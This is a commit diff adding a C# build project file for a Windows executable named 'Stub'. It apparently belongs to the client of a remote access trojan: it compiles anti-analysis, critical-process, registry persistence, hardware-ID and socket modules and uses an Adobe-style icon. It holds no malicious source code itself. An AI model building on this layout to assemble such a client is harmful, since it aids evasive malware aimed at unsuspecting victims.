1
+ <?xml version =" 1.0" encoding =" utf-8" ?>
2
+ <Project ToolsVersion =" 15.0" xmlns =" http://schemas.microsoft.com/developer/msbuild/2003" >
3
+ <Import Project =" ..\packages\MSBuild.ILMerge.Task.1.1.3\build\MSBuild.ILMerge.Task.props" Condition =" Exists('..\packages\MSBuild.ILMerge.Task.1.1.3\build\MSBuild.ILMerge.Task.props')" />
4
+ <Import Project =" ..\packages\ILMerge.3.0.29\build\ILMerge.props" Condition =" Exists('..\packages\ILMerge.3.0.29\build\ILMerge.props')" />
5
+ <Import Project =" $(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props" Condition =" Exists('$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props')" />
6
+ <PropertyGroup >
7
+ <Configuration Condition =" '$(Configuration)' == '' " >Debug</Configuration >
8
+ <Platform Condition =" '$(Platform)' == '' " >AnyCPU</Platform >
9
+ <ProjectGuid >{C3C49F45-2589-4E04-9C50-71B6035C14AE}</ProjectGuid >
10
+ <OutputType >WinExe</OutputType >
11
+ <RootNamespace >Client</RootNamespace >
12
+ <AssemblyName >Stub</AssemblyName >
13
+ <TargetFrameworkVersion >v4.0</TargetFrameworkVersion >
14
+ <FileAlignment >512</FileAlignment >
15
+ <Deterministic >true</Deterministic >
16
+ <TargetFrameworkProfile >Client</TargetFrameworkProfile >
17
+ <IsWebBootstrapper >false</IsWebBootstrapper >
18
+ <NuGetPackageImportStamp >
19
+ </NuGetPackageImportStamp >
20
+ <PublishUrl >publish\</PublishUrl >
21
+ <Install >true</Install >
22
+ <InstallFrom >Disk</InstallFrom >
23
+ <UpdateEnabled >false</UpdateEnabled >
24
+ <UpdateMode >Foreground</UpdateMode >
25
+ <UpdateInterval >7</UpdateInterval >
26
+ <UpdateIntervalUnits >Days</UpdateIntervalUnits >
27
+ <UpdatePeriodically >false</UpdatePeriodically >
28
+ <UpdateRequired >false</UpdateRequired >
29
+ <MapFileExtensions >true</MapFileExtensions >
30
+ <ApplicationRevision >0</ApplicationRevision >
31
+ <ApplicationVersion >1.0.0.%2a</ApplicationVersion >
32
+ <UseApplicationTrust >false</UseApplicationTrust >
33
+ <BootstrapperEnabled >true</BootstrapperEnabled >
34
+ </PropertyGroup >
35
+ <PropertyGroup Condition =" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' " >
36
+ <PlatformTarget >x86</PlatformTarget >
37
+ <DebugSymbols >true</DebugSymbols >
38
+ <DebugType >full</DebugType >
39
+ <Optimize >false</Optimize >
40
+ <OutputPath >..\Binaries\Debug\Stub\</OutputPath >
41
+ <DefineConstants >DEBUG;TRACE</DefineConstants >
42
+ <ErrorReport >prompt</ErrorReport >
43
+ <WarningLevel >4</WarningLevel >
44
+ <DocumentationFile >
45
+ </DocumentationFile >
46
+ <AllowUnsafeBlocks >false</AllowUnsafeBlocks >
47
+ <GenerateSerializationAssemblies >Auto</GenerateSerializationAssemblies >
48
+ </PropertyGroup >
49
+ <PropertyGroup Condition =" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' " >
50
+ <PlatformTarget >x86</PlatformTarget >
51
+ <DebugType >none</DebugType >
52
+ <Optimize >true</Optimize >
53
+ <OutputPath >..\Binaries\Release\Stub\</OutputPath >
54
+ <DefineConstants >TRACE</DefineConstants >
55
+ <ErrorReport >prompt</ErrorReport >
56
+ <WarningLevel >4</WarningLevel >
57
+ <AllowUnsafeBlocks >false</AllowUnsafeBlocks >
58
+ <GenerateSerializationAssemblies >Auto</GenerateSerializationAssemblies >
59
+ <DebugSymbols >false</DebugSymbols >
60
+ </PropertyGroup >
61
+ <PropertyGroup >
62
+ <StartupObject />
63
+ </PropertyGroup >
64
+ <PropertyGroup />
65
+ <PropertyGroup >
66
+ <ApplicationManifest >app.manifest</ApplicationManifest >
67
+ </PropertyGroup >
68
+ <PropertyGroup >
69
+ <SignManifests >false</SignManifests >
70
+ </PropertyGroup >
71
+ <PropertyGroup >
72
+ <ManifestCertificateThumbprint >42D511BFB6981EC00B5DE797DBC5B50B8C1C9140</ManifestCertificateThumbprint >
73
+ </PropertyGroup >
74
+ <PropertyGroup >
75
+ <ManifestKeyFile >fql.pfx</ManifestKeyFile >
76
+ </PropertyGroup >
77
+ <PropertyGroup >
78
+ <SignAssembly >false</SignAssembly >
79
+ </PropertyGroup >
80
+ <PropertyGroup >
81
+ <AssemblyOriginatorKeyFile >
82
+ </AssemblyOriginatorKeyFile >
83
+ </PropertyGroup >
84
+ <PropertyGroup >
85
+ <ManifestTimestampUrl >http://timestamp.globalsign.com/scripts/timestamp.dll</ManifestTimestampUrl >
86
+ </PropertyGroup >
87
+ <PropertyGroup >
88
+ <ApplicationIcon >adobe_128px_1210214_easyicon.net.ico</ApplicationIcon >
89
+ </PropertyGroup >
90
+ <ItemGroup >
91
+ <Reference Include =" Microsoft.VisualBasic" />
92
+ <Reference Include =" Microsoft.Win32.TaskScheduler, Version=2.9.0.0, Culture=neutral, PublicKeyToken=e25603a88b3aa7da, processorArchitecture=MSIL" >
93
+ <HintPath >..\packages\TaskScheduler.2.9.0\lib\net40\Microsoft.Win32.TaskScheduler.dll</HintPath >
94
+ </Reference >
95
+ <Reference Include =" System" />
96
+ <Reference Include =" Microsoft.CSharp" />
97
+ <Reference Include =" System.Data" />
98
+ <Reference Include =" System.Drawing" />
99
+ <Reference Include =" System.Management" />
100
+ <Reference Include =" System.Security" />
101
+ <Reference Include =" System.Windows.Forms" />
102
+ <Reference Include =" System.XML" />
103
+ </ItemGroup >
104
+ <ItemGroup >
105
+ <Compile Include =" Algorithm\Aes256.cs" />
106
+ <Compile Include =" Algorithm\Sha256.cs" />
107
+ <Compile Include =" Handle Packet\Packet.cs" />
108
+ <Compile Include =" Helper\Anti_Analysis.cs" />
109
+ <Compile Include =" Helper\HwidGen.cs" />
110
+ <Compile Include =" Helper\IdSender.cs" />
111
+ <Compile Include =" Helper\Methods.cs" />
112
+ <Compile Include =" Helper\MutexControl.cs" />
113
+ <Compile Include =" Helper\NativeMethods.cs" />
114
+ <Compile Include =" Helper\ProcessCritical.cs" />
115
+ <Compile Include =" Helper\SetRegistry.cs" />
116
+ <Compile Include =" Install\NormalStartup.cs" />
117
+ <Compile Include =" Program.cs" />
118
+ <Compile Include =" Properties\AssemblyInfo.cs" />
119
+ <Compile Include =" Settings.cs" />
120
+ <Compile Include =" Connection\ClientSocket.cs" />
121
+ </ItemGroup >
122
+ <ItemGroup >
123
+ <None Include =" app.config" />
124
+ <None Include =" app.manifest" />
125
+ <None Include =" ILMerge.props" />
126
+ <None Include =" packages.config" />
127
+ </ItemGroup >
128
+ <ItemGroup >
129
+ <BootstrapperPackage Include =" Microsoft.Net.Framework.3.5.SP1" >
130
+ <Visible >False</Visible >
131
+ <ProductName >.NET Framework 3.5 SP1</ProductName >
132
+ <Install >false</Install >
133
+ </BootstrapperPackage >
134
+ </ItemGroup >
135
+ <ItemGroup >
136
+ <Content Include =" 2.ico" />
137
+ <Content Include =" adobe_128px_1210214_easyicon.net.ico" />
138
+ <Content Include =" ILMergeOrder.txt" />
139
+ </ItemGroup >
140
+ <ItemGroup >
141
+ <ProjectReference Include =" ..\MessagePack\MessagePackLib.csproj" >
142
+ <Project >{dc199d9e-cf10-41dd-bbcd-98e71ba8679d}</Project >
143
+ <Name >MessagePackLib</Name >
144
+ </ProjectReference >
145
+ </ItemGroup >
146
+ <ItemGroup >
147
+ <COMReference Include =" TaskScheduler" >
148
+ <Guid >{E34CB9F1-C7F7-424C-BE29-027DCC09363A}</Guid >
149
+ <VersionMajor >1</VersionMajor >
150
+ <VersionMinor >0</VersionMinor >
151
+ <Lcid >0</Lcid >
152
+ <WrapperTool >tlbimp</WrapperTool >
153
+ <Isolated >False</Isolated >
154
+ <EmbedInteropTypes >True</EmbedInteropTypes >
155
+ </COMReference >
156
+ </ItemGroup >
157
+ <Import Project =" $(MSBuildToolsPath)\Microsoft.CSharp.targets" />
158
+ <Target Name =" EnsureNuGetPackageBuildImports" BeforeTargets =" PrepareForBuild" >
159
+ <PropertyGroup >
160
+ <ErrorText >This project references NuGet package(s) that are missing on this computer. Use NuGet Package Restore to download them. For more information, see http://go.microsoft.com/fwlink/?LinkID=322105. The missing file is {0}.</ErrorText >
161
+ </PropertyGroup >
162
+ <Error Condition =" !Exists('..\packages\ILMerge.3.0.29\build\ILMerge.props')" Text =" $([System.String]::Format('$(ErrorText)', '..\packages\ILMerge.3.0.29\build\ILMerge.props'))" />
163
+ <Error Condition =" !Exists('..\packages\MSBuild.ILMerge.Task.1.1.3\build\MSBuild.ILMerge.Task.props')" Text =" $([System.String]::Format('$(ErrorText)', '..\packages\MSBuild.ILMerge.Task.1.1.3\build\MSBuild.ILMerge.Task.props'))" />
164
+ <Error Condition =" !Exists('..\packages\MSBuild.ILMerge.Task.1.1.3\build\MSBuild.ILMerge.Task.targets')" Text =" $([System.String]::Format('$(ErrorText)', '..\packages\MSBuild.ILMerge.Task.1.1.3\build\MSBuild.ILMerge.Task.targets'))" />
165
+ </Target >
166
+ <Import Project =" ..\packages\MSBuild.ILMerge.Task.1.1.3\build\MSBuild.ILMerge.Task.targets" Condition =" Exists('..\packages\MSBuild.ILMerge.Task.1.1.3\build\MSBuild.ILMerge.Task.targets')" />
167
+ </Project >
0 commit comments